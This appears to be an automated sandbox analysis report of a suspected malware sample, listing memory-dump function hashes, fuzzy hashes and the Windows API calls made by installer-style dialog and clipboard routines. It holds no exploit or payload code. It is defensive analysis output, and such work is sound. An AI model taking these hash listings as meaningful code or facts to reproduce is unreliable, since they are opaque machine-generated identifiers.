Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07f767adc02e5dad4cbbe11bc6f92fafeb09a35d57b642ff9a70fe8808c79e6c
Instruction ID: 719dedd5c95286301f8630485b41b8acaf86cb00fbb46b0ed222d4c34bb014bd
Opcode Fuzzy Hash: 07f767adc02e5dad4cbbe11bc6f92fafeb09a35d57b642ff9a70fe8808c79e6c
Instruction Fuzzy Hash: 88C19D74E00218CFEB14DFA5D994B9DBBF2AF89304F2081A9D409AB395DB359A85CF10

Function 36B9D870 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50a9ce006d49951b219238a57bb7eb7030e1644aa0c1415e0eeb49d4bc136205
Instruction ID: 773fea470602f7c4f47349accff224ee10ad2242ed4a1240ad284436a05a41df
Opcode Fuzzy Hash: 50a9ce006d49951b219238a57bb7eb7030e1644aa0c1415e0eeb49d4bc136205
Instruction Fuzzy Hash: 59C18D74E00218CFEB14DFA5D994B9DBBF2BF89304F2081A9D409AB395DB359A85CF50

Function 36B9C058 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdbdd24073ca48b2f7d90e4cb049ead4ff1e451f93f108767e25a8f0f144a008
Instruction ID: 4ac5cfe50c6654def038a3318b52376436cd2dd534e298a389b8c0f70984976d
Opcode Fuzzy Hash: bdbdd24073ca48b2f7d90e4cb049ead4ff1e451f93f108767e25a8f0f144a008
Instruction Fuzzy Hash: 59C19F74E00218CFEB54DFA5D954BDDBBF2AF89304F2080A9D409AB395DB359A85CF50

Function 36B99650 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a20298dccece89cf8e981517841c03261c12283d4f5e14a9bfc9606b45f1d9df
Instruction ID: b4bf008874ef100076dedc9859bfc4b7a71da5ce6c55cca696791067ae30285f
Opcode Fuzzy Hash: a20298dccece89cf8e981517841c03261c12283d4f5e14a9bfc9606b45f1d9df
Instruction Fuzzy Hash: 38C19C74E00218CFEB54DFA5D994B9DBBB2FF89304F2480A9D409AB395DB359A85CF10

Function 36B9B7A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 988176fd0240a9342978f540b941c25eadc6ff01ab77b4d9b844e54d275ca184
Instruction ID: 1a04257ef6a3fefa13fc9768837692acdb895f81ad17bacb51956ed74dd54b82
Opcode Fuzzy Hash: 988176fd0240a9342978f540b941c25eadc6ff01ab77b4d9b844e54d275ca184
Instruction Fuzzy Hash: 97C19D74E00218CFEB54DFA5D994BDDBBF2AF89304F2081A9D409AB395DB359A85CF10

Function 36B98DA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 361eb1ce1742bb170a9852fab9bbd5dc658ec1b010145247ce023eb2df207a11
Instruction ID: 4ee4d03890070549558de27f1026c740e39134540ca134c3912d035181ddbe6a
Opcode Fuzzy Hash: 361eb1ce1742bb170a9852fab9bbd5dc658ec1b010145247ce023eb2df207a11
Instruction Fuzzy Hash: 23C18F74E00218CFEB54DFA5D954B9DBBB2BF89304F2080A9D409BB395DB359A85CF50

Function 36B991F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb678a84b323e03fe0a2835b1293ff667fba3a17048b54dd44359cf0c843d9dc
Instruction ID: bdc53ce434ba7a951cee64fd26eb2426dcbaaa5509891a80c474740e8c0924b5
Opcode Fuzzy Hash: bb678a84b323e03fe0a2835b1293ff667fba3a17048b54dd44359cf0c843d9dc
Instruction Fuzzy Hash: A9C19D74E00218CFEB54DFA5D994BDDBBB2AF89304F2480A9D409AB395DB359A85CF10

Function 36B9E9D0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e06804adca9f08db4cf616b44440c975e9791548caed33e2e15666ad71352da
Instruction ID: dcc4605a9fb08d3f6f0d8058c25a011a6767d4d82b0adad21afd5559af50e804
Opcode Fuzzy Hash: 8e06804adca9f08db4cf616b44440c975e9791548caed33e2e15666ad71352da
Instruction Fuzzy Hash: 6BC19E74E00218CFEB54DFA5D954B9DBBB2AF89304F2080A9D409BB395DB359A85CF50

Function 36B9FB30 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f69bad98ac21c89c9abc355cd342e9ccd7dafa0323bad3d24d5a5b4a04795da
Instruction ID: 7f62a1139ccf3eade195436155b39268749d3d37ad94e1b8bc0b6c53a9909e84
Opcode Fuzzy Hash: 3f69bad98ac21c89c9abc355cd342e9ccd7dafa0323bad3d24d5a5b4a04795da
Instruction Fuzzy Hash: 12C18D74E00218CFEB14DFA5D994BDDBBF2AF89304F2080A9D409AB395DB359A85CF50

Function 36B9E578 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b13fad9439e09453193d5fc92bea31d6ac457fea54e2ee5767ea3ba32667c83
Instruction ID: b580e073da278f86db276af80ca4305cec79582bbd0682eb2103ba4511675920
Opcode Fuzzy Hash: 8b13fad9439e09453193d5fc92bea31d6ac457fea54e2ee5767ea3ba32667c83
Instruction Fuzzy Hash: 0FC19F74E00218CFEB54DFA5D994B9DBBF2AF89304F2080A9D409BB395DB359A85CF11

Function 36B9B350 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fbea1f9bf8270cd43ba46f78ba960572ee69bb8f9ef63c345d4c99aa54a1c43
Instruction ID: 2a4c81346b7310560eb34dcd9c1e2b0f43968e34433f91c7d47df6c8863ab50a
Opcode Fuzzy Hash: 7fbea1f9bf8270cd43ba46f78ba960572ee69bb8f9ef63c345d4c99aa54a1c43
Instruction Fuzzy Hash: 5CC18D74E00218CFEB14DFA5D994B9DBBF2BF89304F2081A9D409AB395DB359A85CF50

Function 36B98948 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4385c8f646d235e28e20e25bed4ff912706d050c64461e2ada9e1ae9959aece
Instruction ID: 9d231ad129de96779cb14e2567ff22920cf7158e81b230ac6c9d1c90167db07e
Opcode Fuzzy Hash: b4385c8f646d235e28e20e25bed4ff912706d050c64461e2ada9e1ae9959aece
Instruction Fuzzy Hash: 65C19C74E00218CFEB14DFA5D994B9DBBF2AF89304F2084A9D409BB395DB359A85CF10

Function 371F1730 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b09d1de315754bc6d5ee0c2ad993019d34dd88d014bb087849ba2d1d25e6eab
Instruction ID: 62d910531e6ff01ff5627c68fae6083142e200ebe5f25fbca619127d8935548a
Opcode Fuzzy Hash: 3b09d1de315754bc6d5ee0c2ad993019d34dd88d014bb087849ba2d1d25e6eab
Instruction Fuzzy Hash: 54C19E74E00218CFEB54DFA5D994BADBBB2BF89304F1081A9D409AB395DB359A85CF10

Function 371F1FE0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 026216dfb60509c30b8c0c99fd2bf92f63f2fcd5c58d17e7ce47f8936b2b9043
Instruction ID: e566695fd049da6d337dcda93baa423d3d34c64f577ca00633a887d6d57e4913
Opcode Fuzzy Hash: 026216dfb60509c30b8c0c99fd2bf92f63f2fcd5c58d17e7ce47f8936b2b9043
Instruction Fuzzy Hash: 95C19E74E00218CFEB14DFA5D994B9DBBB2BF89304F1081A9D409BB395DB359A85CF11

Function 371F3E48 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f210a82e85adc8a0a01e1a2b9cf36396995d6ef04fc3787513f2b79ddd0f29e
Instruction ID: 6589394c8820785ed973c44fa3735e29396734c0d7938ac57ebf34b616285229
Opcode Fuzzy Hash: 3f210a82e85adc8a0a01e1a2b9cf36396995d6ef04fc3787513f2b79ddd0f29e
Instruction Fuzzy Hash: 3EC1A074E04218CFEB54DFA5D954B9DBBB2BF89300F1081A9D809BB395DB359A85CF10

Function 371F0D48 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b11c474e74b17a871f988a3678efecb7fc82cdc61de43e48de99dc8144a129f
Instruction ID: c8d94db0355548c8c7f59d39951d2e749cb6ea43b178e5d3997b26625457cc99
Opcode Fuzzy Hash: 9b11c474e74b17a871f988a3678efecb7fc82cdc61de43e48de99dc8144a129f
Instruction Fuzzy Hash: DDC19E74E00218CFEB54DFA5D994BADBBB2BF89304F1081A9D409BB395DB359A85CF10

Function 371F3598 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcb04c4967ac355269a1f588fb812c5add8f19736c1ba0b8df06059882533cd
Instruction ID: 083eab605f20d11beac381cf0e8f8016bbbfdeb04456e113bf667a826440fe48
Opcode Fuzzy Hash: 6bcb04c4967ac355269a1f588fb812c5add8f19736c1ba0b8df06059882533cd
Instruction Fuzzy Hash: 38C19F74E00218CFEB54DFA5D954BADBBB2BF89304F1081A9D409BB395DB359A85CF10

Function 371F2438 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03e5e2104dd87a8c73cc9764b649c72860e93fdd9b593b58b908618da66fdd39
Instruction ID: d27e594f6ef0c183d393fe79c2e8b98c93d8c9a648c064a88eee28bfd216a9c0
Opcode Fuzzy Hash: 03e5e2104dd87a8c73cc9764b649c72860e93fdd9b593b58b908618da66fdd39
Instruction Fuzzy Hash: 01C19F74E00218CFEB54DFA5D994B9DBBB2BF89304F2081A9D409AB395DB359E85CF10

Function 371F0498 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba8771f4568fe56b0a5abbbc20ad087925d981db65f80ebaefd2c3cbf172b32
Instruction ID: 4744f809c258f276ba400a5ef3060a0200bb8169fb5d81978fd147f1fa2b9681
Opcode Fuzzy Hash: 9ba8771f4568fe56b0a5abbbc20ad087925d981db65f80ebaefd2c3cbf172b32
Instruction Fuzzy Hash: BFC19F74E00218CFEB14DFA5D954BADBBB2BF89304F1081A9D409AB395DB359E85CF50

Function 371F2CE8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4209a963ec822ac0ba5f753ca475521d71df11630341c0d3a452b479ce119af8
Instruction ID: de8bd8cd40c0943bc1a5fb9d975caf03cc720951f148ed3c5aa22ec58247a810
Opcode Fuzzy Hash: 4209a963ec822ac0ba5f753ca475521d71df11630341c0d3a452b479ce119af8
Instruction Fuzzy Hash: A3C18F74E00218CFEB54DFA5D954B9DBBB2AF89304F2081A9D409BB395DB359E85CF10

Function 371F1B88 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdfc63d235a92d4d5ff5cd2bf04669e31f1d3d3591491381956ee32125b60485
Instruction ID: 7e4931998c1dea30482a8e054f00213ef7d4519eaa27d00f589e25311f14f6ff
Opcode Fuzzy Hash: fdfc63d235a92d4d5ff5cd2bf04669e31f1d3d3591491381956ee32125b60485
Instruction Fuzzy Hash: 83C18F74E00218CFEB54DFA5D954BADBBB2BF89304F1081A9D409BB395DB359A85CF10

Function 371F3140 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c86e429ffd0f8aff6cb1cc15572221f037ee654b6827fe135a50e1b2b2bb7eb1
Instruction ID: a71aaaebf34cc56597cf88812239008c9b76d4c56a4654836bdf4039785493bb
Opcode Fuzzy Hash: c86e429ffd0f8aff6cb1cc15572221f037ee654b6827fe135a50e1b2b2bb7eb1
Instruction Fuzzy Hash: F5C19F74E00218CFEB54DFA5D994B9DBBB2BF89304F1081A9D409BB395DB359A85CF10

Function 371F11A0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c716370eb0758a08d8bab2f4c39523ab5b5669afa07fa91c0fb4c9fc44eb598
Instruction ID: 9aa2bf5aa084b2af8381b8af3ce8295a637117c650c5b2dd1636108dcb031a14
Opcode Fuzzy Hash: 6c716370eb0758a08d8bab2f4c39523ab5b5669afa07fa91c0fb4c9fc44eb598
Instruction Fuzzy Hash: 73C19074E00218CFEB54DFA5D994B9DBBB2BF89304F2081A9D409BB395DB359A85CF10

Function 371F39F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddac5fad8788760dbda18b1518f94f81f4163c1ded13cabb57465c4275a2de4f
Instruction ID: 9b35e8d36e4b6204c7c69d840ff5bb7b521182089f0f921167414db8db49c2a9
Opcode Fuzzy Hash: ddac5fad8788760dbda18b1518f94f81f4163c1ded13cabb57465c4275a2de4f
Instruction Fuzzy Hash: 42C18E74E00218CFEB54DFA5D994B9DBBB2BF89304F2081A9D409BB395DB359A85CF10

Function 371F0040 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bfa00382f589850c7dac0d8c02fb2972b3f932285306129f1a022055ad2768d
Instruction ID: 6b4a4f75bf23c714e85ee56a6bbbb08212cbf09e0ee3478100fd4ab4ab11e0eb
Opcode Fuzzy Hash: 4bfa00382f589850c7dac0d8c02fb2972b3f932285306129f1a022055ad2768d
Instruction Fuzzy Hash: 28C19F74E00218CFEB54DFA5D954BADBBB2BF89304F1081A9D409AB395DB359A85CF10

Function 371F2890 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0ae30a8ebf55991ce316092d0dcd53687ac3b706e7825eadf09770c0d58fd59
Instruction ID: bda4d2b08babb30f22c714b837cb33fe32c870959ddf0017c8919ebef7873260
Opcode Fuzzy Hash: f0ae30a8ebf55991ce316092d0dcd53687ac3b706e7825eadf09770c0d58fd59
Instruction Fuzzy Hash: 6BC18E74E00218CFEB14DFA5D994B9DBBB2BF89304F1081A9D409BB395DB359A85CF11

Function 371F08F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed456c42ce060aee5143996b3e95e1b3f902339a6da519d3e096552afd2435b2
Instruction ID: 7d359249b93c77f0d1b966d349aee9950bba72c001a45f77d6cedec6dbad36e2
Opcode Fuzzy Hash: ed456c42ce060aee5143996b3e95e1b3f902339a6da519d3e096552afd2435b2
Instruction Fuzzy Hash: 98C19E74E00218CFEB54DFA5D994B9DBBB2BF89304F2081A9D409AB395DB359E85CF10

Function 371F4B13 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c87c8d3f962d74e69d04713cafcf82e8642f532d97bbaf7cd7b188e0190f005
Instruction ID: 34c41892d66017f98e15f7543ce68485c4c9da2eb330ff5e9d71072dbb8c6b5a
Opcode Fuzzy Hash: 8c87c8d3f962d74e69d04713cafcf82e8642f532d97bbaf7cd7b188e0190f005
Instruction Fuzzy Hash: 80A19D74A05228CFEB65DF24C894BD9B7B2BB8A301F5085EAD80DA7350DB319E81DF51

Function 371F4CF3 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d7d9dc57c9505eab3bfbad0eb7bdb9d80d8ad5beed5ec096b6d4f933358c8cf
Instruction ID: bdefe2a088f554812b777f7d22dc56a64068017c68d3c532f0a545f5df01e8a1
Opcode Fuzzy Hash: 2d7d9dc57c9505eab3bfbad0eb7bdb9d80d8ad5beed5ec096b6d4f933358c8cf
Instruction Fuzzy Hash: 82519274A05228CFDB65DF24D894BA9B7B2BF4A301F5085EAD809B7350DB329E81CF51

Function 3775CE78 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b63d4e4665e1b634568f4c9a4c0fd6318ebb62837d778966a9b2674935b64e4
Instruction ID: fa0ac2b53079376f27f5d229723b72839be20f5def6fce12fadcb0b409ef44f2
Opcode Fuzzy Hash: 8b63d4e4665e1b634568f4c9a4c0fd6318ebb62837d778966a9b2674935b64e4
Instruction Fuzzy Hash: 0CD06C79E442188BCB219FA4A8407ECF7B0AB9A321F0024A6C558A7250DB709A948E96

Function 371F9567 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 427f2796dd564dc89ae574d110b52c456e28025ace0267855d9cf5269b6c1444
Instruction ID: 4a335d2090237035d24a9d9c89f12ed1147e6a25669735a14d10b3efa5e4ec0b
Opcode Fuzzy Hash: 427f2796dd564dc89ae574d110b52c456e28025ace0267855d9cf5269b6c1444
Instruction Fuzzy Hash: 21D06C75D442288BCB21EFA498447ECB3B1BB9A310F0125A6C548A7260DB709EA48A56

Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004055ED
GetDlgItem.USER32(?,000003EE), ref: 004055FC
GetClientRect.USER32(?,?), ref: 00405639
GetSystemMetrics.USER32(00000002), ref: 00405640
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
ShowWindow.USER32(?,00000008), ref: 004056DC
GetDlgItem.USER32(?,000003EC), ref: 004056FD
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
GetDlgItem.USER32(?,000003F8), ref: 0040560B

Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2

GetDlgItem.USER32(?,000003EC), ref: 0040574F
CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
CloseHandle.KERNEL32(00000000), ref: 00405764
ShowWindow.USER32(00000000), ref: 00405788
ShowWindow.USER32(?,00000008), ref: 0040578D
ShowWindow.USER32(00000008), ref: 004057D7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
CreatePopupMenu.USER32 ref: 0040581C
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
GetWindowRect.USER32(?,?), ref: 00405850
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
OpenClipboard.USER32(00000000), ref: 004058B1
EmptyClipboard.USER32 ref: 004058B7
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
GlobalLock.KERNEL32(00000000), ref: 004058CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
GlobalUnlock.KERNEL32(00000000), ref: 00405901
SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
CloseClipboard.USER32 ref: 00405912

Strings

(7B, xrefs: 0040587D
{, xrefs: 004057F5

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
ShowWindow.USER32(?), ref: 00403EDF
DestroyWindow.USER32 ref: 00403EF3
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
GetDlgItem.USER32(?,?), ref: 00403F30
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
IsWindowEnabled.USER32(00000000), ref: 00403F4B
GetDlgItem.USER32(?,?), ref: 00403FF9
GetDlgItem.USER32(?,00000002), ref: 00404003
SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
GetDlgItem.USER32(?,00000003), ref: 00404114
ShowWindow.USER32(00000000,?), ref: 00404135
EnableWindow.USER32(?,?), ref: 00404147
EnableWindow.USER32(?,?), ref: 00404162
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
